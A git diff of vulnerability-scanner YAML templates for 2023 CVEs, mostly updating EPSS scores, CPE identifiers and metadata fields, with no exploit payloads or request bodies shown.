a/http/cves/2023/CVE-2023-0514.yaml +++ b/http/cves/2023/CVE-2023-0514.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-0514 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29212 + epss-percentile: 0.29179 cpe: cpe:2.3:a:membership_database_project:membership_database:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0527.yaml b/http/cves/2023/CVE-2023-0527.yaml index 33ee85f27d..a23fca9acc 100644 --- a/http/cves/2023/CVE-2023-0527.yaml +++ b/http/cves/2023/CVE-2023-0527.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-0527 cwe-id: CWE-79 - epss-score: 0.0025 - epss-percentile: 0.62719 + epss-score: 0.00228 + epss-percentile: 0.6097 cpe: cpe:2.3:a:online_security_guards_hiring_system_project:online_security_guards_hiring_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0552.yaml b/http/cves/2023/CVE-2023-0552.yaml index b008b84c4e..f5d13b3b5b 100644 --- a/http/cves/2023/CVE-2023-0552.yaml +++ b/http/cves/2023/CVE-2023-0552.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-0552 cwe-id: CWE-601 epss-score: 0.00077 - epss-percentile: 0.32054 + epss-percentile: 0.31982 cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0562.yaml b/http/cves/2023/CVE-2023-0562.yaml index 7bb0ec7512..3549c34b60 100644 --- a/http/cves/2023/CVE-2023-0562.yaml +++ b/http/cves/2023/CVE-2023-0562.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-0562 cwe-id: CWE-89 - epss-score: 0.02099 - epss-percentile: 0.87899 + epss-score: 0.02592 + epss-percentile: 0.89177 cpe: cpe:2.3:a:phpgurukul:bank_locker_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0563.yaml b/http/cves/2023/CVE-2023-0563.yaml index 7abf19d7ee..db11470427 100644 --- a/http/cves/2023/CVE-2023-0563.yaml +++ b/http/cves/2023/CVE-2023-0563.yaml @@ -19,8 +19,8 @@ info: cvss-score: 4.8 cve-id: CVE-2023-0563 cwe-id: CWE-79 - epss-score: 0.00563 - epss-percentile: 0.75135 + epss-score: 0.00354 + epss-percentile: 0.68998 cpe: cpe:2.3:a:phpgurukul:bank_locker_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0600.yaml b/http/cves/2023/CVE-2023-0600.yaml index e1084342e1..7f8049e000 100644 --- a/http/cves/2023/CVE-2023-0600.yaml +++ b/http/cves/2023/CVE-2023-0600.yaml @@ -6,26 +6,26 @@ info: severity: critical description: | The plugin does not escape user input which is concatenated to an SQL query, allowing unauthenticated visitors to conduct SQL Injection attacks. - remediation: Fixed in version 6.9 reference: - https://wpscan.com/vulnerability/8f46df4d-cb80-4d66-846f-85faf2ea0ec4 - https://nvd.nist.gov/vuln/detail/CVE-2023-0600 + remediation: Fixed in version 6.9 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-0600 cwe-id: CWE-89 + cpe: cpe:2.3:a:plugins-market:wp_visitor_statistics:*:*:*:*:*:wordpress:*:* epss-score: 0.03606 epss-percentile: 0.9066 - cpe: cpe:2.3:a:plugins-market:wp_visitor_statistics:*:*:*:*:*:wordpress:*:* metadata: - verified: true - max-request: 1 - vendor: plugins-market - product: wp_visitor_statistics - framework: wordpress fofa-query: body="wp-stats-manager" - public-www: "/wp-content/plugins/wp-stats-manager/" + framework: wordpress + max-request: 2 + product: wp_visitor_statistics + public-www: /wp-content/plugins/wp-stats-manager/ + vendor: plugins-market + verified: true tags: cve,cve2023,wp,wp-plugin,wordpress,wpscan,unauth,wp-stats-manager,sqli,plugins-market variables: str: '{{rand_int(100000, 999999)}}' diff --git a/http/cves/2023/CVE-2023-0602.yaml b/http/cves/2023/CVE-2023-0602.yaml index 6db9d03933..e59570635d 100644 --- a/http/cves/2023/CVE-2023-0602.yaml +++ b/http/cves/2023/CVE-2023-0602.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-0602 cwe-id: CWE-79 epss-score: 0.00064 - epss-percentile: 0.26298 + epss-percentile: 0.26204 cpe: cpe:2.3:a:johnniejodelljr:twittee_text_tweet:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0630.yaml b/http/cves/2023/CVE-2023-0630.yaml index c2df32c495..3cbc619318 100644 --- a/http/cves/2023/CVE-2023-0630.yaml +++ b/http/cves/2023/CVE-2023-0630.yaml @@ -18,8 +18,8 @@ info: cvss-score: 8.8 cve-id: CVE-2023-0630 cwe-id: CWE-89 - epss-score: 0.0628 - epss-percentile: 0.92858 + epss-score: 0.0621 + epss-percentile: 0.92859 cpe: cpe:2.3:a:wp-slimstat:slimstat_analytics:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0669.yaml b/http/cves/2023/CVE-2023-0669.yaml index 5a50e34cb1..44adf87828 100644 --- a/http/cves/2023/CVE-2023-0669.yaml +++ b/http/cves/2023/CVE-2023-0669.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.2 cve-id: CVE-2023-0669 cwe-id: CWE-502 - epss-score: 0.96669 - epss-percentile: 0.99546 + epss-score: 0.96821 + epss-percentile: 0.99616 cpe: cpe:2.3:a:fortra:goanywhere_managed_file_transfer:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0777.yaml b/http/cves/2023/CVE-2023-0777.yaml index fe2f7c089c..f24253e657 100644 --- a/http/cves/2023/CVE-2023-0777.yaml +++ b/http/cves/2023/CVE-2023-0777.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-0777 cwe-id: CWE-305,NVD-CWE-Other - epss-score: 0.0392 - epss-percentile: 0.91033 + epss-score: 0.10783 + epss-percentile: 0.94548 cpe: cpe:2.3:a:modoboa:modoboa:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0900.yaml b/http/cves/2023/CVE-2023-0900.yaml index 8d7186acfb..a60e5c0e52 100644 --- a/http/cves/2023/CVE-2023-0900.yaml +++ b/http/cves/2023/CVE-2023-0900.yaml @@ -15,8 +15,8 @@ info: cvss-score: 7.2 cve-id: CVE-2023-0900 cwe-id: CWE-89 - epss-score: 0.00711 - epss-percentile: 0.7824 + epss-score: 0.00995 + epss-percentile: 0.81908 cpe: cpe:2.3:a:wpdevart:pricing_table_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0942.yaml b/http/cves/2023/CVE-2023-0942.yaml index d9bee30df3..fffd7aa3f4 100644 --- a/http/cves/2023/CVE-2023-0942.yaml +++ b/http/cves/2023/CVE-2023-0942.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-0942 cwe-id: CWE-79 - epss-score: 0.00358 - epss-percentile: 0.69027 + epss-score: 0.00356 + epss-percentile: 0.69098 cpe: cpe:2.3:a:artisanworkshop:japanized_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0947.yaml b/http/cves/2023/CVE-2023-0947.yaml index ecfd98d9fa..f82f6ce0d4 100644 --- a/http/cves/2023/CVE-2023-0947.yaml +++ b/http/cves/2023/CVE-2023-0947.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-0947 cwe-id: CWE-22 - epss-score: 0.02414 - epss-percentile: 0.88763 + epss-score: 0.01669 + epss-percentile: 0.86282 cpe: cpe:2.3:a:flatpress:flatpress:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0948.yaml b/http/cves/2023/CVE-2023-0948.yaml index 329fa4bd69..cf7e3de9f0 100644 --- a/http/cves/2023/CVE-2023-0948.yaml +++ b/http/cves/2023/CVE-2023-0948.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-0948 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29238 + epss-percentile: 0.29205 cpe: cpe:2.3:a:artisanworkshop:japanized_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-0968.yaml b/http/cves/2023/CVE-2023-0968.yaml index a00fb37d39..66d4e3c5c2 100644 --- a/http/cves/2023/CVE-2023-0968.yaml +++ b/http/cves/2023/CVE-2023-0968.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-0968 cwe-id: CWE-79 - epss-score: 0.00286 - epss-percentile: 0.65269 + epss-score: 0.00229 + epss-percentile: 0.61047 cpe: cpe:2.3:a:kibokolabs:watu_quiz:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1020.yaml b/http/cves/2023/CVE-2023-1020.yaml index bdc16af457..ac5dee9825 100644 --- a/http/cves/2023/CVE-2023-1020.yaml +++ b/http/cves/2023/CVE-2023-1020.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-1020 cwe-id: CWE-89 - epss-score: 0.13362 - epss-percentile: 0.95024 + epss-score: 0.16196 + epss-percentile: 0.95472 cpe: cpe:2.3:a:wp_live_chat_shoutbox_project:wp_live_chat_shoutbox:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1080.yaml b/http/cves/2023/CVE-2023-1080.yaml index 97e1c1b391..b83b53080d 100644 --- a/http/cves/2023/CVE-2023-1080.yaml +++ b/http/cves/2023/CVE-2023-1080.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-1080 cwe-id: CWE-79 - epss-score: 0.00286 - epss-percentile: 0.65269 + epss-score: 0.00229 + epss-percentile: 0.61047 cpe: cpe:2.3:a:gnpublisher:gn_publisher:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1177.yaml b/http/cves/2023/CVE-2023-1177.yaml index d51c003f30..9523be3b9d 100644 --- a/http/cves/2023/CVE-2023-1177.yaml +++ b/http/cves/2023/CVE-2023-1177.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-1177 cwe-id: CWE-29,CWE-22 - epss-score: 0.03046 - epss-percentile: 0.89916 + epss-score: 0.02668 + epss-percentile: 0.89327 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1263.yaml b/http/cves/2023/CVE-2023-1263.yaml index eedb9b5cd5..c46526d2e3 100644 --- a/http/cves/2023/CVE-2023-1263.yaml +++ b/http/cves/2023/CVE-2023-1263.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.3 cve-id: CVE-2023-1263 cwe-id: CWE-200 - epss-score: 0.00349 - epss-percentile: 0.68655 + epss-score: 0.00254 + epss-percentile: 0.63154 cpe: cpe:2.3:a:niteothemes:coming_soon_\&_maintenance:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1362.yaml b/http/cves/2023/CVE-2023-1362.yaml index 82712391fd..c32c6c67f5 100644 --- a/http/cves/2023/CVE-2023-1362.yaml +++ b/http/cves/2023/CVE-2023-1362.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-1362 cwe-id: CWE-1021 epss-score: 0.00078 - epss-percentile: 0.32799 + epss-percentile: 0.32752 cpe: cpe:2.3:a:bumsys_project:bumsys:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1408.yaml b/http/cves/2023/CVE-2023-1408.yaml index 763d48294a..16973cce32 100644 --- a/http/cves/2023/CVE-2023-1408.yaml +++ b/http/cves/2023/CVE-2023-1408.yaml @@ -15,8 +15,8 @@ info: cvss-score: 7.2 cve-id: CVE-2023-1408 cwe-id: CWE-89 - epss-score: 0.00995 - epss-percentile: 0.8183 + epss-score: 0.01339 + epss-percentile: 0.84615 cpe: cpe:2.3:a:video_list_manager_project:video_list_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1454.yaml b/http/cves/2023/CVE-2023-1454.yaml index b70fba36db..94a69246d8 100644 --- a/http/cves/2023/CVE-2023-1454.yaml +++ b/http/cves/2023/CVE-2023-1454.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-1454 cwe-id: CWE-89 epss-score: 0.0391 - epss-percentile: 0.91023 + epss-percentile: 0.91088 cpe: cpe:2.3:a:jeecg:jeecg-boot:3.5.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-1496.yaml b/http/cves/2023/CVE-2023-1496.yaml index 9d7fe8783e..2d29dfd5ae 100644 --- a/http/cves/2023/CVE-2023-1496.yaml +++ b/http/cves/2023/CVE-2023-1496.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-1496 cwe-id: CWE-79 epss-score: 0.00077 - epss-percentile: 0.31957 + epss-percentile: 0.31886 cpe: cpe:2.3:a:evilmartians:imgproxy:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1546.yaml b/http/cves/2023/CVE-2023-1546.yaml index 8f248a11be..4ad1565e62 100644 --- a/http/cves/2023/CVE-2023-1546.yaml +++ b/http/cves/2023/CVE-2023-1546.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-1546 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29212 + epss-percentile: 0.29179 cpe: cpe:2.3:a:plainviewplugins:mycryptocheckout:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1671.yaml b/http/cves/2023/CVE-2023-1671.yaml index ea72fffae6..69b04698ac 100644 --- a/http/cves/2023/CVE-2023-1671.yaml +++ b/http/cves/2023/CVE-2023-1671.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-1671 cwe-id: CWE-77 - epss-score: 0.95052 - epss-percentile: 0.99119 + epss-score: 0.95313 + epss-percentile: 0.99196 cpe: cpe:2.3:a:sophos:web_appliance:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1698.yaml b/http/cves/2023/CVE-2023-1698.yaml index f92521c25e..49132cad1e 100644 --- a/http/cves/2023/CVE-2023-1698.yaml +++ b/http/cves/2023/CVE-2023-1698.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-1698 cwe-id: CWE-78 - epss-score: 0.52862 - epss-percentile: 0.97282 + epss-score: 0.47065 + epss-percentile: 0.97124 cpe: cpe:2.3:o:wago:compact_controller_100_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-1719.yaml b/http/cves/2023/CVE-2023-1719.yaml index 0b61cdcd84..3fb0a4ab4d 100644 --- a/http/cves/2023/CVE-2023-1719.yaml +++ b/http/cves/2023/CVE-2023-1719.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2023-1719 cwe-id: CWE-665 epss-score: 0.02807 - epss-percentile: 0.8953 + epss-percentile: 0.89587 cpe: cpe:2.3:a:bitrix24:bitrix24:22.0.300:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1730.yaml b/http/cves/2023/CVE-2023-1730.yaml index fe350275d7..b8ef69b9c7 100644 --- a/http/cves/2023/CVE-2023-1730.yaml +++ b/http/cves/2023/CVE-2023-1730.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-1730 cwe-id: CWE-89 - epss-score: 0.22408 - epss-percentile: 0.96018 + epss-score: 0.27296 + epss-percentile: 0.96346 cpe: cpe:2.3:a:supportcandy:supportcandy:*:*:*:*:*:wordpress:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-1780.yaml b/http/cves/2023/CVE-2023-1780.yaml index df73d828a7..d2ceda19e7 100644 --- a/http/cves/2023/CVE-2023-1780.yaml +++ b/http/cves/2023/CVE-2023-1780.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-1780 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29238 + epss-percentile: 0.29205 cpe: cpe:2.3:a:codeermeneer:companion_sitemap_generator:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1835.yaml b/http/cves/2023/CVE-2023-1835.yaml index 029a238f98..54a4aebd81 100644 --- a/http/cves/2023/CVE-2023-1835.yaml +++ b/http/cves/2023/CVE-2023-1835.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-1835 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29212 + epss-percentile: 0.29179 cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1880.yaml b/http/cves/2023/CVE-2023-1880.yaml index 3ef0346035..6ca55e3dad 100644 --- a/http/cves/2023/CVE-2023-1880.yaml +++ b/http/cves/2023/CVE-2023-1880.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-1880 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29125 + epss-percentile: 0.29087 cpe: cpe:2.3:a:phpmyfaq:phpmyfaq:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1890.yaml b/http/cves/2023/CVE-2023-1890.yaml index c6f9594875..e68a582021 100644 --- a/http/cves/2023/CVE-2023-1890.yaml +++ b/http/cves/2023/CVE-2023-1890.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-1890 cwe-id: CWE-79 epss-score: 0.00302 - epss-percentile: 0.66205 + epss-percentile: 0.66395 cpe: cpe:2.3:a:pauple:tablesome:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-20073.yaml b/http/cves/2023/CVE-2023-20073.yaml index 0b02d701e5..67cdcb80bb 100644 --- a/http/cves/2023/CVE-2023-20073.yaml +++ b/http/cves/2023/CVE-2023-20073.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-20073 cwe-id: CWE-434 epss-score: 0.52411 - epss-percentile: 0.97269 + epss-percentile: 0.97291 cpe: cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2009.yaml b/http/cves/2023/CVE-2023-2009.yaml index 1459704d9e..2c3b5eae74 100644 --- a/http/cves/2023/CVE-2023-2009.yaml +++ b/http/cves/2023/CVE-2023-2009.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-2009 cwe-id: CWE-79 epss-score: 0.00078 - epss-percentile: 0.32708 + epss-percentile: 0.32659 cpe: cpe:2.3:a:pretty_url_project:pretty_url:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-20198.yaml b/http/cves/2023/CVE-2023-20198.yaml index d787e6a74d..9123e3990f 100644 --- a/http/cves/2023/CVE-2023-20198.yaml +++ b/http/cves/2023/CVE-2023-20198.yaml @@ -23,7 +23,7 @@ info: cvss-score: 10 cve-id: CVE-2023-20198 epss-score: 0.89074 - epss-percentile: 0.98445 + epss-percentile: 0.98482 cpe: cpe:2.3:o:cisco:ios_xe:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2023.yaml b/http/cves/2023/CVE-2023-2023.yaml index 33efa3e5e0..3390fc80f6 100644 --- a/http/cves/2023/CVE-2023-2023.yaml +++ b/http/cves/2023/CVE-2023-2023.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-2023 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29238 + epss-percentile: 0.29205 cpe: cpe:2.3:a:kunalnagar:custom_404_pro:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-20864.yaml b/http/cves/2023/CVE-2023-20864.yaml index 6d468e6800..90d3b0cc42 100644 --- a/http/cves/2023/CVE-2023-20864.yaml +++ b/http/cves/2023/CVE-2023-20864.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-20864 cwe-id: CWE-502 - epss-score: 0.22533 - epss-percentile: 0.96027 + epss-score: 0.22038 + epss-percentile: 0.96031 cpe: cpe:2.3:a:vmware:aria_operations_for_logs:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-20887.yaml b/http/cves/2023/CVE-2023-20887.yaml index fd30a040c2..a417e2510c 100644 --- a/http/cves/2023/CVE-2023-20887.yaml +++ b/http/cves/2023/CVE-2023-20887.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-20887 cwe-id: CWE-77 - epss-score: 0.95239 - epss-percentile: 0.99163 + epss-score: 0.96325 + epss-percentile: 0.99437 cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-20888.yaml b/http/cves/2023/CVE-2023-20888.yaml index da207fb406..e21277bdc6 100644 --- a/http/cves/2023/CVE-2023-20888.yaml +++ b/http/cves/2023/CVE-2023-20888.yaml @@ -18,8 +18,8 @@ info: cvss-score: 8.8 cve-id: CVE-2023-20888 cwe-id: CWE-502 - epss-score: 0.23454 - epss-percentile: 0.96097 + epss-score: 0.28835 + epss-percentile: 0.96433 cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-20889.yaml b/http/cves/2023/CVE-2023-20889.yaml index e8ab151af0..c56cb341c9 100644 --- a/http/cves/2023/CVE-2023-20889.yaml +++ b/http/cves/2023/CVE-2023-20889.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-20889 cwe-id: CWE-77 - epss-score: 0.01964 - epss-percentile: 0.8742 + epss-score: 0.09004 + epss-percentile: 0.94018 cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2122.yaml b/http/cves/2023/CVE-2023-2122.yaml index ac9888b620..4b6d2cb73c 100644 --- a/http/cves/2023/CVE-2023-2122.yaml +++ b/http/cves/2023/CVE-2023-2122.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-2122 cwe-id: CWE-79 epss-score: 0.00064 - epss-percentile: 0.26298 + epss-percentile: 0.26204 cpe: cpe:2.3:a:10web:image_optimizer:*:*:*:*:*:wordpress:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-2130.yaml b/http/cves/2023/CVE-2023-2130.yaml index 9a9a2393a0..a3a4c882d7 100644 --- a/http/cves/2023/CVE-2023-2130.yaml +++ b/http/cves/2023/CVE-2023-2130.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-2130 cwe-id: CWE-89 epss-score: 0.01554 - epss-percentile: 0.85729 + epss-percentile: 0.85779 cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-2178.yaml b/http/cves/2023/CVE-2023-2178.yaml index 2196464883..d37a0d4de9 100644 --- a/http/cves/2023/CVE-2023-2178.yaml +++ b/http/cves/2023/CVE-2023-2178.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-2178 cwe-id: CWE-79 epss-score: 0.00078 - epss-percentile: 0.32708 + epss-percentile: 0.32659 cpe: cpe:2.3:a:aajoda:aajoda_testimonials:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-22232.yaml b/http/cves/2023/CVE-2023-22232.yaml index bbb6d5ea8b..ee8575710e 100644 --- a/http/cves/2023/CVE-2023-22232.yaml +++ b/http/cves/2023/CVE-2023-22232.yaml @@ -9,14 +9,20 @@ info: reference: - https://helpx.adobe.com/security/products/connect/apsb23-05.html - https://nvd.nist.gov/vuln/detail/CVE-2023-22232 + - http://packetstormsecurity.com/files/171390/Adobe-Connect-11.4.5-12.1.5-Local-File-Disclosure.html classification: - cve-id: CVE-2023-22232 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N cvss-score: 5.3 - cwe-id: CWE-284 + cve-id: CVE-2023-22232 + cwe-id: CWE-284,NVD-CWE-noinfo + epss-score: 0.09134 + epss-percentile: 0.94058 + cpe: cpe:2.3:a:adobe:connect:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 + vendor: adobe + product: connect shodan-query: title:"Adobe Connect" tags: cve,cve2023,adobe,lfd,download diff --git a/http/cves/2023/CVE-2023-2224.yaml b/http/cves/2023/CVE-2023-2224.yaml index f7fca2e30c..26e906c47e 100644 --- a/http/cves/2023/CVE-2023-2224.yaml +++ b/http/cves/2023/CVE-2023-2224.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-2224 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.41274 + epss-percentile: 0.41348 cpe: cpe:2.3:a:10web:seo:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-22432.yaml b/http/cves/2023/CVE-2023-22432.yaml index d889903aba..1535d2d11f 100644 --- a/http/cves/2023/CVE-2023-22432.yaml +++ b/http/cves/2023/CVE-2023-22432.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-22432 cwe-id: CWE-601 - epss-score: 0.03444 - epss-percentile: 0.90465 + epss-score: 0.02498 + epss-percentile: 0.88998 cpe: cpe:2.3:a:web2py:web2py:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-22463.yaml b/http/cves/2023/CVE-2023-22463.yaml index a0a450a6fb..a6ecde5b99 100644 --- a/http/cves/2023/CVE-2023-22463.yaml +++ b/http/cves/2023/CVE-2023-22463.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-22463 cwe-id: CWE-798 - epss-score: 0.01935 - epss-percentile: 0.87326 + epss-score: 0.02067 + epss-percentile: 0.87825 cpe: cpe:2.3:a:fit2cloud:kubepi:*:*:*:*:*:*:*:* metadata: verified: true @@ -31,7 +31,6 @@ info: shodan-query: html:"kubepi" fofa-query: "kubepi" tags: cve,cve2023,kubepi,k8s,auth-bypass,fit2cloud - variables: name: "{{rand_base(6)}}" password: "{{rand_base(8)}}" diff --git a/http/cves/2023/CVE-2023-22478.yaml b/http/cves/2023/CVE-2023-22478.yaml index dae21cda72..20bef4fb98 100644 --- a/http/cves/2023/CVE-2023-22478.yaml +++ b/http/cves/2023/CVE-2023-22478.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-22478 cwe-id: CWE-862 - epss-score: 0.03029 - epss-percentile: 0.89878 + epss-score: 0.02283 + epss-percentile: 0.88516 cpe: cpe:2.3:a:fit2cloud:kubepi:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-22480.yaml b/http/cves/2023/CVE-2023-22480.yaml index b3cb588467..acff688b37 100644 --- a/http/cves/2023/CVE-2023-22480.yaml +++ b/http/cves/2023/CVE-2023-22480.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-22480 cwe-id: CWE-863,CWE-285 - epss-score: 0.01801 - epss-percentile: 0.86742 + epss-score: 0.01488 + epss-percentile: 0.85428 cpe: cpe:2.3:a:fit2cloud:kubeoperator:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-22515.yaml b/http/cves/2023/CVE-2023-22515.yaml index 050a315ff4..73fc22284a 100644 --- a/http/cves/2023/CVE-2023-22515.yaml +++ b/http/cves/2023/CVE-2023-22515.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-22515 - epss-score: 0.95529 - epss-percentile: 0.99224 + epss-score: 0.95708 + epss-percentile: 0.99285 cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-22518.yaml b/http/cves/2023/CVE-2023-22518.yaml index 93a073277e..5f558064d1 100644 --- a/http/cves/2023/CVE-2023-22518.yaml +++ b/http/cves/2023/CVE-2023-22518.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-22518 cwe-id: CWE-863 - epss-score: 0.96763 - epss-percentile: 0.99589 + epss-score: 0.96525 + epss-percentile: 0.99508 cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-22620.yaml b/http/cves/2023/CVE-2023-22620.yaml index f38e22ed0a..48b58bd15d 100644 --- a/http/cves/2023/CVE-2023-22620.yaml +++ b/http/cves/2023/CVE-2023-22620.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-22620 cwe-id: CWE-863 - epss-score: 0.01995 - epss-percentile: 0.87547 + epss-score: 0.06157 + epss-percentile: 0.92833 cpe: 